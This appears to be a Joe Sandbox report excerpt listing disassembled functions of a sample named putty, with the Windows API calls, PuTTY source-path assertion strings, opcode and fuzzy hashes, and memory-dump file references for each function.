                                                          Similarity
                                                          • API ID: QueryValue$_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/utils/registry.c$size < allocsize
                                                          • API String ID: 4156801415-3295803084
                                                          • Opcode ID: c9357b5cd9070ea9f28fd442f1c7bd38efce1c1879d53600b97b3029d582d436
                                                          • Instruction ID: 834085c1b99208ad136d51fc1c07dd55e12bdd16ffcde8a6048303ec8230ffc2
                                                          • Opcode Fuzzy Hash: c9357b5cd9070ea9f28fd442f1c7bd38efce1c1879d53600b97b3029d582d436
                                                          • Instruction Fuzzy Hash: 0E21BB33B2A51192F650DB55A400B6BF390FBC4B94FD55031FD8E47B45DE3ED8019A14
                                                          Function 00007FF738A58BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ButtonChecked
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
                                                          • API String ID: 1719414920-994577671
                                                          • Opcode ID: 101e6a568da7f983d046a016e64fcc0f9b702adbbf1840bd19f6594f1160c4b9
                                                          • Instruction ID: 92bc5afb26d2489a534cf11d5c088dafe8974c4e67440e8fecd8f2e6cc0c7038
                                                          • Opcode Fuzzy Hash: 101e6a568da7f983d046a016e64fcc0f9b702adbbf1840bd19f6594f1160c4b9
                                                          • Instruction Fuzzy Hash: FD217473B0650AA5E610AB46E8816A5E760FB44B94FC48135DF4D47391EE3FE885E324
                                                          Function 00007FF738A37D20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738AFAA84: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF738AEBB86,?,?,?,00007FF738AEBBA7,?,?,?,00007FF738AED05E), ref: 00007FF738AFAAAA
                                                          • GetDC.USER32 ref: 00007FF738A37D65
                                                          • SelectPalette.GDI32 ref: 00007FF738A37D80
                                                            • Part of subcall function 00007FF738AFA0EC: _set_error_mode.LIBCMT ref: 00007FF738AFA113
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FeaturePalettePresentProcessorSelect_set_error_mode
                                                          • String ID: !wgs->wintw_hdc$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c
                                                          • API String ID: 1342517984-1893345581
                                                          • Opcode ID: 899692d88e7cdc047586990661a6e2ecb4244797324f979e38a2282d2660edc1
                                                          • Instruction ID: 3601f168858adf32db3cec2995819d6ca05d10d1674e5e72cb4acd51a432e29b
                                                          • Opcode Fuzzy Hash: 899692d88e7cdc047586990661a6e2ecb4244797324f979e38a2282d2660edc1
                                                          • Instruction Fuzzy Hash: E6F0F423A06113A2FA187726F845BB9D361EF40BC0F944130C91D06A80CF7FB442EB28
                                                          Function 00007FF738A5BE00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AsyncErrorLastSelect_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/select-gui.c$winsel_hwnd
                                                          • API String ID: 3444122918-3835285417
                                                          • Opcode ID: 055cab730dbf00f3a9b4e8936b7f9efbc5cb510023e8262056d438244291121d
                                                          • Instruction ID: 982e23dfbdfc8630f341ee337e727b70ba77274e2c13fefb2cf10a2e0f41e849
                                                          • Opcode Fuzzy Hash: 055cab730dbf00f3a9b4e8936b7f9efbc5cb510023e8262056d438244291121d
                                                          • Instruction Fuzzy Hash: D0F0D1A3B0911361FA552B6AB8819B5C2919B48BA0F945230CD1C43290EE3EA8C6A728
                                                          Function 00007FF738A36260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ClientDesktopInfoMonitorRectWindow
                                                          • String ID: (
                                                          • API String ID: 2130016935-3887548279
                                                          • Opcode ID: a1505dc74beb0b5e4bfb1d5a67904c8bd33e14f96849789e4f377d1c5e223afe
                                                          • Instruction ID: 813926990e6a7fd4a5f7dee40539429ea34ab2e8f896e0a4d63658d500b25564
                                                          • Opcode Fuzzy Hash: a1505dc74beb0b5e4bfb1d5a67904c8bd33e14f96849789e4f377d1c5e223afe
                                                          • Instruction Fuzzy Hash: 86012862A0DB4692FB50AB60F844329E3A0EF49B54F844234DC4D03350DE7DE48AE714
                                                          Function 00007FF738A64633 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control$RTS/CTS
                                                          • API String ID: 274883806-1158513486
                                                          • Opcode ID: 17da3ac95dc485c31095cd83b692304d4457b7ceb00bde3eaf2e0a7f5a05ef5d
                                                          • Instruction ID: 656f02821fc5cef76929a9ad3d9e6064e9d7397b219ef4260cef4fa221d468eb
                                                          • Opcode Fuzzy Hash: 17da3ac95dc485c31095cd83b692304d4457b7ceb00bde3eaf2e0a7f5a05ef5d
                                                          • Instruction Fuzzy Hash: EC01F763E0D603A2FA21EB25E440569F360FF85780FD04231DB4D46A98DF7EE681EB24
                                                          Function 00007FF738A6464E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control$DSR/DTR
                                                          • API String ID: 274883806-321787297
                                                          • Opcode ID: 098ddfec7f8e469a14d23c8d1d90f908f6ef54a0b73336e8a1759b2a333cb857
                                                          • Instruction ID: 7b83539079477e021a985b5f9782cd98fdbca4b58dc8a5d50e98b03cf1725a43
                                                          • Opcode Fuzzy Hash: 098ddfec7f8e469a14d23c8d1d90f908f6ef54a0b73336e8a1759b2a333cb857
                                                          • Instruction Fuzzy Hash: A201F723A0D60352EA21EB25E44016AF320EF89780FC04231DA4D46A98DE7DE681EB14
                                                          Function 00007FF738A64625 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control$XON/XOFF
                                                          • API String ID: 274883806-924046750
                                                          • Opcode ID: 59c3a669f34e8b0e9ba172c7ce8ca03ecfb584f098ce5d699e6a255ed61582a1
                                                          • Instruction ID: 6344dd5876ddbf497b2f1bbff942cd7876b72373de7bcbdd8e1e347f1545c708
                                                          • Opcode Fuzzy Hash: 59c3a669f34e8b0e9ba172c7ce8ca03ecfb584f098ce5d699e6a255ed61582a1
                                                          • Instruction Fuzzy Hash: A0F02613B0D61361FA21EB119400579E310EF85B80FC04231DA4D06988DE7DE681E724
                                                          Function 00007FF738A39690 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleThread_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$clipboard == CLIP_SYSTEM
                                                          • API String ID: 968033324-856420494
                                                          • Opcode ID: 9c5316d3c78a9fe1cfaabbfecd416a52fe0cbf0ee7a327785f7175f7fefb59cb
                                                          • Instruction ID: 807084248d996aef84355ec62e4ad8bf105cd66f59f8546556084032a8894860
                                                          • Opcode Fuzzy Hash: 9c5316d3c78a9fe1cfaabbfecd416a52fe0cbf0ee7a327785f7175f7fefb59cb
                                                          • Instruction Fuzzy Hash: 4CF0A762A1E607A1FB10AB10F855566F390EF85744FC44435D44F07764DF3EE505D714
                                                          Function 00007FF738A3BAE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ObjectPaletteSelectStock_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$wgs->term_hwnd
                                                          • API String ID: 2940787024-1764328106
                                                          • Opcode ID: 736e2d95929279315c4da6cea961b3daf8523e88ae2ed17628a26ed56410d4ab
                                                          • Instruction ID: fc5d3fa7de72db96b34e02edbcf1a20def2628fd56af65b8a4ed62d03d7724b2
                                                          • Opcode Fuzzy Hash: 736e2d95929279315c4da6cea961b3daf8523e88ae2ed17628a26ed56410d4ab
                                                          • Instruction Fuzzy Hash: 56F0EC46A05422A1EA10A706A841364E320EF88BE0F908030CD0C03B84DE3EA482E328
                                                          Function 00007FF738B0B7C8 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF738B0BBA0), ref: 00007FF738B0B8EB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF738B0BBA0), ref: 00007FF738B0B975
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: 0671426c9464719ec4550cd45017b6a4e54302218ab75db4f3a19593d3983b17
                                                          • Instruction ID: 844ad57fd6851bc07d3d7f44a8ed17e8d8fb6a6b8905221afd514803c8f52dd7
                                                          • Opcode Fuzzy Hash: 0671426c9464719ec4550cd45017b6a4e54302218ab75db4f3a19593d3983b17
                                                          • Instruction Fuzzy Hash: E49112A3E18653A9FB50AB659440ABCF7A0FB04B8CF844135DE1E53695CF3AD441E32B
                                                          Function 00007FF738B1487C Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo$_get_daylight
                                                          • String ID:
                                                          • API String ID: 72036449-0
                                                          • Opcode ID: c37372ec61b4f9942604653e21d47dbb8aa72487a77f6d84006ada27973a88c2
                                                          • Instruction ID: bd26709bcecef77b73d12ebf270c8a09a6eebd58a9362622a2065b13683e5984
                                                          • Opcode Fuzzy Hash: c37372ec61b4f9942604653e21d47dbb8aa72487a77f6d84006ada27973a88c2
                                                          • Instruction Fuzzy Hash: BE510233E0C2036AF7297A28900037DE583DB41754F998535CA5D6E2C6CF3EEA41A66F
                                                          Function 00007FF738A55250 Relevance: 6.1, APIs: 4, Instructions: 117windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID:
                                                          • API String ID: 3015471070-0
                                                          • Opcode ID: 87083c0412621a819ac6875e0e999821b924a340d0f4222b18e2f3ee1e75df2f
                                                          • Instruction ID: 61aa64a7c5fe037a554e2d3e921f20bf4f621dfec4b67353794d12258aca15ce
                                                          • Opcode Fuzzy Hash: 87083c0412621a819ac6875e0e999821b924a340d0f4222b18e2f3ee1e75df2f
                                                          • Instruction Fuzzy Hash: E341F273A0A601A6E660AB11A944F7AF750FB45BA0F914330CE9D03794EF3EA585F718
                                                          Function 00007FF738A39F60 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Color
                                                          • String ID:
                                                          • API String ID: 2811717613-0
                                                          • Opcode ID: 5387a8898f084a8cccd4cb3bdc30c73654086cb8e3c8a36586e71063f45b0eb8
                                                          • Instruction ID: cdeeaa73a4a016e9e83085afdd3d586c7b5ecafb571de5236786da61a4ced9c8
                                                          • Opcode Fuzzy Hash: 5387a8898f084a8cccd4cb3bdc30c73654086cb8e3c8a36586e71063f45b0eb8
                                                          • Instruction Fuzzy Hash: 1E31900310D7C156E731E3A5641119BEA21EBD9784F88026AEBCD07B8ADD7CC606DB69
                                                          Function 00007FF738A3182E Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Context$CompositionProcReleaseStringWindow
                                                          • String ID:
                                                          • API String ID: 1012507852-0
                                                          • Opcode ID: a2443fe7e29c611472d95208efbc1e4f36d6122258a1dc2df3ac41b94aeb5b60
                                                          • Instruction ID: 98959fb3b76defa251ca7f33aa0c34b5b842c96c31dbe6117fb137fee91b197b
                                                          • Opcode Fuzzy Hash: a2443fe7e29c611472d95208efbc1e4f36d6122258a1dc2df3ac41b94aeb5b60
                                                          • Instruction Fuzzy Hash: 2421D813F0911666FB61BA16D802BB5E1809B85B94FC44031DD0D9B7C2DE7FA842676C
                                                          Function 00007FF738A32221 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Rect$InvalidateWindow$ClientDestroyProc
                                                          • String ID:
                                                          • API String ID: 3789280143-0
                                                          • Opcode ID: a8db0e0c1f875e56507162407ea4717d0a346b5994ecbdc9aa002ade8e35d871
                                                          • Instruction ID: 5bb590f31c1c8a7eeec85a97725ac9c2ab6efa93cd72ad4e41108e0c5573f8fa
                                                          • Opcode Fuzzy Hash: a8db0e0c1f875e56507162407ea4717d0a346b5994ecbdc9aa002ade8e35d871
